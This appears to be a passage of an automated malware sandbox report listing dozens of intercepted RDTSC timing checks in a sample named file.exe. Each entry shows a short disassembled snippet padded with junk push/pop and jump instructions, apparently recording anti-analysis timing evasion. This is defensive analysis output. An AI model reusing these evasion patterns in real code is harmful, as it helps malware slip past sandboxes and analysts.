                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E699 second address: 132E6AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9EA4BB43CDh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132E6AC second address: 132E6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132EC57 second address: 132EC68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9EA4BB43CDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132EC68 second address: 132EC82 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9EA509B5D6h 0x00000008 je 00007F9EA509B5D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007F9EA509B5DAh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132EC82 second address: 132ECA7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9EA4BB43CEh 0x00000008 jbe 00007F9EA4BB43C6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9EA4BB43D1h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132EE14 second address: 132EE39 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9EA509B5D6h 0x00000008 jmp 00007F9EA509B5E5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132EE39 second address: 132EE3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132EE3D second address: 132EE41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132F57B second address: 132F589 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9EA4BB43C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132F589 second address: 132F593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9EA509B5D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132F6EC second address: 132F6F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13362AA second address: 13362DD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9EA509B5DEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F9EA509B5D6h 0x00000014 jmp 00007F9EA509B5E7h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13362DD second address: 13362E3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13362E3 second address: 1336303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E6h 0x00000007 je 00007F9EA509B5DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1335317 second address: 133531B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1335702 second address: 1335707 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1335707 second address: 133570F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334C9F second address: 1334CD1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnc 00007F9EA509B5D6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop eax 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 js 00007F9EA509B5D6h 0x0000001a jmp 00007F9EA509B5DCh 0x0000001f pop ebx 0x00000020 jmp 00007F9EA509B5DBh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334CD1 second address: 1334CDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F9EA4BB43C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334CDD second address: 1334CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334CE1 second address: 1334CEB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13422BC second address: 13422F9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9EA509B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F9EA509B5E5h 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007F9EA509B5E8h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13422F9 second address: 1342305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007F9EA4BB43C6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340D5E second address: 1340D6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F9EA509B5DAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340EAC second address: 1340EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340EB2 second address: 1340EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340EB6 second address: 1340EC2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9EA4BB43C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340EC2 second address: 1340EC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341198 second address: 134119E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134119E second address: 13411A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13411A2 second address: 13411A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341339 second address: 134133D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134133D second address: 1341341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341341 second address: 1341347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341483 second address: 13414AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA4BB43CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9EA4BB43D4h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13414AF second address: 13414B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13414B3 second address: 13414D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9EA4BB43D3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13414D0 second address: 13414D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13415F8 second address: 13415FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13418EC second address: 13418F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13418F2 second address: 13418FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007F9EA4BB43C6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341A58 second address: 1341A5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341A5C second address: 1341A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F9EA4BB43C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push edx 0x0000000e jmp 00007F9EA4BB43CCh 0x00000013 jns 00007F9EA4BB43C6h 0x00000019 pop edx 0x0000001a pushad 0x0000001b jc 00007F9EA4BB43C6h 0x00000021 push edi 0x00000022 pop edi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1341BD3 second address: 1341BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340A0B second address: 1340A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1340A0F second address: 1340A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347CEF second address: 1347CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347CF7 second address: 1347D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jng 00007F9EA509B5D6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347D08 second address: 1347D29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA4BB43D7h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F9EA4BB43C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1346B4F second address: 1346B55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1346B55 second address: 1346B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1346B5B second address: 1346B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F82D0 second address: 12F82DA instructions: 0x00000000 rdtsc 0x00000002 je 00007F9EA4BB43CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8550 second address: 12F8554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F89D9 second address: 12F8A24 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9EA4BB43C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 31960AFAh 0x00000011 mov edi, 7DA3037Eh 0x00000016 call 00007F9EA4BB43C9h 0x0000001b pushad 0x0000001c jmp 00007F9EA4BB43D9h 0x00000021 push ebx 0x00000022 pushad 0x00000023 popad 0x00000024 pop ebx 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push esi 0x0000002a jl 00007F9EA4BB43C6h 0x00000030 pop esi 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8A24 second address: 12F8A54 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 ja 00007F9EA509B5D6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ecx 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jg 00007F9EA509B5D6h 0x0000001a popad 0x0000001b pop ecx 0x0000001c mov eax, dword ptr [eax] 0x0000001e pushad 0x0000001f push ebx 0x00000020 jmp 00007F9EA509B5DBh 0x00000025 pop ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8A54 second address: 12F8A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8A58 second address: 12F8A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9EA509B5E1h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8BE5 second address: 12F8BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9EA4BB43D1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8BFA second address: 12F8C24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e mov edi, dword ptr [ebp+122D1B78h] 0x00000014 push eax 0x00000015 push eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8F96 second address: 12F8F9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8F9C second address: 12F8FB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8FB9 second address: 12F8FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F97A7 second address: 12F97D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jng 00007F9EA509B5E2h 0x0000000d jmp 00007F9EA509B5DCh 0x00000012 nop 0x00000013 mov dh, 42h 0x00000015 push ebx 0x00000016 or ecx, 13A7CC15h 0x0000001c pop edx 0x0000001d lea eax, dword ptr [ebp+1247E0C0h] 0x00000023 nop 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F97D7 second address: 12F97F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9EA4BB43D8h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F97F4 second address: 12F9812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9812 second address: 12F9816 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347142 second address: 1347148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347148 second address: 134714D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134714D second address: 1347153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347471 second address: 1347477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347477 second address: 134748E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9EA509B5E1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134787D second address: 1347883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347883 second address: 1347887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347887 second address: 1347895 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9EA4BB43C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1347895 second address: 13478AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134A994 second address: 134A9CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007F9EA4BB43C6h 0x00000009 jc 00007F9EA4BB43C6h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9EA4BB43CCh 0x00000017 jmp 00007F9EA4BB43D9h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134AB41 second address: 134AB62 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F9EA509B5E3h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D3FA second address: 134D413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 jne 00007F9EA4BB43C6h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jp 00007F9EA4BB43C6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D413 second address: 134D417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D417 second address: 134D425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F9EA4BB43C6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D425 second address: 134D429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD59B second address: 12BD5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD5A0 second address: 12BD5B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F9EA509B5D6h 0x0000000a jnp 00007F9EA509B5D6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D122 second address: 134D12E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F9EA4BB43C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D12E second address: 134D132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134D132 second address: 134D13C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9EA4BB43C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13514C2 second address: 13514CC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9EA509B5E2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13514CC second address: 13514DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9EA4BB43C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13514DE second address: 13514F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9EA509B5E0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350C76 second address: 1350C94 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9EA4BB43C6h 0x00000008 jmp 00007F9EA4BB43D0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350C94 second address: 1350C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350C98 second address: 1350CCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA4BB43D7h 0x00000007 jmp 00007F9EA4BB43D7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350E02 second address: 1350E0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F9EA509B5D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350E0C second address: 1350E26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9EA4BB43D4h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350E26 second address: 1350E49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5DAh 0x00000007 jmp 00007F9EA509B5DDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F9EA509B5D6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350E49 second address: 1350E77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F9EA4BB43C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jbe 00007F9EA4BB43C6h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 jmp 00007F9EA4BB43CDh 0x0000001e push eax 0x0000001f push edx 0x00000020 ja 00007F9EA4BB43C6h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350E77 second address: 1350E7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1350E7D second address: 1350E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
